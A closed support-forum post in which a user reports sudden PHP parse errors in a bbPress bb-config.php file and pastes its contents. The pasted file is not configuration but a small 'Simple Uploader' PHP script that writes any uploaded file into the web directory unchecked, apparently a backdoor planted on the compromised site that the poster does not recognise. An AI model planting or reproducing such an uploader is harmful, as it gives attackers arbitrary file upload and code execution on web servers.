Sudden BBconfig issues
-
Suddenly I cannot access my forums and am getting this error :
Warning: Unexpected character in input: ” (ASCII=92) state=1 in /home//bb-config.php on line 5Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/bb-config.php on line 17
I’ve deactivated all plugins on the main blog. This has the buddypress integration.
The last tampering before I noticed this was a single size change for a widget block in the themes stylesheet but the problem persists with switching themes. It cuts the homepage to half size as well without a scroll.This is the bb-config:
`title> Simple Uploader
Simple uploader
<form enctype=îmultipart/form-dataî action=îî method=îpostî>
File :
<?php
if (@is_uploaded_file($_FILES[“userfile”][“tmp_name”])) {
copy($_FILES[“userfile”][“tmp_name”], ìî . $_FILES[“userfile”][“name”]);
echo ìFile uploaded successfully
î;
}
?>`It’s been working properly for months with my new theme, any suggestions?
I don’t have any extra forum related plugin
- The topic ‘Sudden BBconfig issues’ is closed to new replies.